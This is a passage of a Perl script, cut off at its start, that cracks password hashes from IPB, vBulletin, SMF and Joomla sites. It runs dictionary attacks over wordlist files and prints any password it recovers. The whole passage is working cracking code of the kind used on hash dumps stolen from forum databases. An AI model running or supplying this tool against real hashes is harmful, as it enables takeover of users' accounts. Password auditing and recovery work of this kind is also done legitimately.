	print "[!] Using $file...\n";
			foreach $password(<DICT>) {
				$password=~s/\s|\n//;
				chomp($password);
				$cracked = sha1_hex($user.$password);
				if ($cracked eq $hash) {
					return "[+] Hash cracked !: $password\n\n";
				}
			}
	print "[!] Nothing found with $file...\n\n";
	}
	return "\n[-] Password not found\n\n";
}
 
sub joomla_cracker{
	my $hash = shift;
	my $salt = shift;
	my $dir  = shift;
	foreach $file (@FILES) {
	open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n";
	print "[!] Using $file...\n";
			foreach $password(<DICT>) {
				$password=~s/\s|\n//;
				chomp($password);
				$cracked = md5_hex($password.$salt);
				if ($cracked eq $hash) {
					return "[+] Hash cracked !: $password\n\n";
				}
			}
	print "[!] Nothing found with $file...\n\n";
	}
	return "\n[-] Password not found\n\n";
}
 
my ($dir, $hash, $salt, $cms, $arg);
 
foreach $loop (@ARGV) {
	for ($loop) {
		/^-d$/ and do { $dir = $ARGV[($arg+1)]; last; };
		/^-h$/ and do { $hash = $ARGV[($arg+1)];  last; };
		/^-s$/ and do { $salt = $ARGV[($arg+1)]; last; };
		/^-c$/ and do { $cms = $ARGV[($arg+1)]; last; };
	}
	$arg++;
}
 
 
# Main

print "\n[!] Cracking $hash with $salt as username/salt...\n\n";
 
opendir(DIR, $dir) || die "\n[-] Folder not found\n\n";
 
while($file = readdir(DIR)) {
     if ($file ne '.' and $file ne '..') {
	$FILES[$clean] = $file;
	$clean++;
     }
}
 
for ($cms) {
  /^IPB$/    and do { $result = &ipb_cracker($hash,$salt,$dir); last; };
  /^VB$/     and do { $result = &vb_cracker($hash,$salt,$dir);  last; };
  /^SMF$/    and do { $result = &smf_cracker($hash,$salt,$dir); last; };
  /^JOOMLA$/ and do { $result = &joomla_cracker($hash,$salt,$dir); last; };
  /^.$/      and do { print "[-] CMS not available\n"; exit(0); last; };
}
 
print $result;
 
# Exit

close(DICT);
closedir(DIR);
exit(0);
 
__END__